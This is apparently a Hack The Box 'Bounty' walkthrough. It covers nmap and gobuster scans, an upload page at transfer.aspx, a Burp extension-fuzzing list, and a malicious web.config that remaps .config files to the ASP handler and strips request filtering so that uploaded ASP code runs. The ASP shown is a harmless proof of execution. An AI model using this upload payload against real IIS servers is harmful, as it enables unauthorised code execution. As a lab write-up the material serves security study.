Scanning and Enumeration

Scanning

kali@kali:~$ nmap -sC -sV -p 80 10.10.10.93
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-25 09:33 EST
Nmap scan report for 10.10.10.93
Host is up (0.077s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.30 seconds

Enumeration

Port 80

Gobuster Scan

kali@kali:~/HTB/Bounty$ gobuster dir --url http://10.10.10.93/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x aspx 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.93/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     aspx
[+] Timeout:        10s
===============================================================
2020/11/27 11:35:07 Starting gobuster
===============================================================
/transfer.aspx (Status: 200)

Looks like we can upload images. Thats all good, but check this out, there is a way with burp that you can check for extension. This can be super useful when conducting a penetration test and help you save a lot of time. Here is how to do so.

BurpSuite

Create a an extension file where to test the extensions validity on the application

vi extensions
* php
* aspx 
* php7
* php
* config
* cgi
* exe 

Intercept a file, send to repeater and intruder.

https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/poc-server.com

Soroush Dalili | A web application security ninja 🥷soroush.secproject.com

Looks like we can execute code by changing the config file and adding our code at the end.

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->